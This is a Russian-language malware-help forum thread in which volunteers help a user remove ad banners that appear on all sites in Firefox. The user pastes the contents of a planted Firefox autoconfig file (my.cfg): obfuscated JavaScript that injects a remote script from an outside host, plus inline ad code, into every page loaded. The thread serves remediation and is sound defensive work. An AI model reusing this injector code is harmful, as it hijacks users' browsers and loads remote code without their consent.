Появились рекламные баннеры на всех сайтах в Только!!! в Мозиле. Подозрительных дополнений нет вроде...
Появились рекламные баннеры на всех сайтах в Только!!! в Мозиле. Подозрительных дополнений нет вроде...
Уважаемый(ая) pavlentiy67, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Обновите базы AVZ и переделайте логи
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Обновился...
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Прикрепляю файлы
эти файлы изменились (были созданы) 17 апреля. Что в них?C:\Program Files\mozilla firefox\browser\defaults\preferences\my-prefs.js
C:\Program Files\mozilla firefox\my.cfg
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
В файле my-prefs.js такой код...
А в файле my.cfg зашифрованный длинный кодКод:pref('general.config.filename', 'my.cfg'); pref('general.config.obscure_value', 0);и так далее а в концеКод:// First line is ommited try{ var inline_code = '(function() {var appName = encodeURIComponent("__APP_NAME__");var userId = "__USER_ID__";var appId = "__APP_ID__";var campId = "__CAMP_ID__";try {var _0x1efb=["\x5F\x5F\x41\x50\x50\x5F\x4E\x41\x4D\x45\x5F\x5F","\x6E\x61\x6D\x65","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x64\x65\x78\x4F\x66","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x73\x6D\x61\x72\x74\x73\x68\x6F\x70\x70\x69\x6E\x67\x2E\x63\x6F\x6D","\x73\x68\x6F\x70\x70\x73\x74\x6F\x70\x2E\x63\x6F\x6D","\x6C\x6F\x63\x61\x6C\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\x79\x65\x6C\x6C\x6F\x77\x6D\x6F\x78\x69\x65\x2E\x63\x6F\x6D","\xПохоже что именно так и подключается реклама. Я вчера полностью удалял Мозилу и заново устанавливал кстати.Код:var _injectInlineJSCode=function(a,b){var c=b.createElement("script");c.setAttribute("type","text/javascript");c.innerHTML=a;(b.getElementsByTagName("head")[0]||b.getElementsByTagName("body")[0]).appendChild(c)},_handleDocumentElementInsterted=function(a){if(a&&a instanceof Components.interfaces.nsIDOMHTMLDocument){var b=a&&a.defaultView?a.defaultView:null;b&&b===b.top&&(_injectInlineJSCode("setTimeout(function(){var tag = document.createElement('script');tag.setAttribute('type','text/javascript');tag.setAttribute('src','//icm.r.worldssl.net/ff/m.js');(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(tag);},1000*2);", a),_injectInlineJSCode("setTimeout(function(){"+inline_code+"},1000*3);",a))}},observerService=Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService); observerService.addObserver({QueryInterface:function(a){if(a.equals(Components.interfaces.nsIObserver)||a.equals(Components.interfaces.nsISupports)||a.equals(Components.interfaces.nsISupportsWeakReference))return this;throw Components.results.NS_NOINTERFACE;},observe:function(a,b,c){try{"document-element-inserted"===b&&_handleDocumentElementInsterted(a)}catch(d){}}},"document-element-inserted",!1); })(); } catch(e){
Переместите эти файлы куда-нибудь в другое место и проверьте проблему
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Без них рекламы нет, все работает хорошо. Но странно, я же переустанавливал до этого и полностью удалял и ставил заново..А они откуда то снова появлялись
Оба файла заархивируйте с паролем virus и пришлите по красной ссылке Прислать запрошенный карантин вверху темы
После этого оба файла удалите
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 ReconnectАнтивирусная помощь
Готово. Спасибо за помощь!
Статистика проведенного лечения:
- Получено карантинов: 1
- Обработано файлов: 2
- В ходе лечения вредоносные программы в карантинах не обнаружены
Уважаемый(ая) pavlentiy67, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.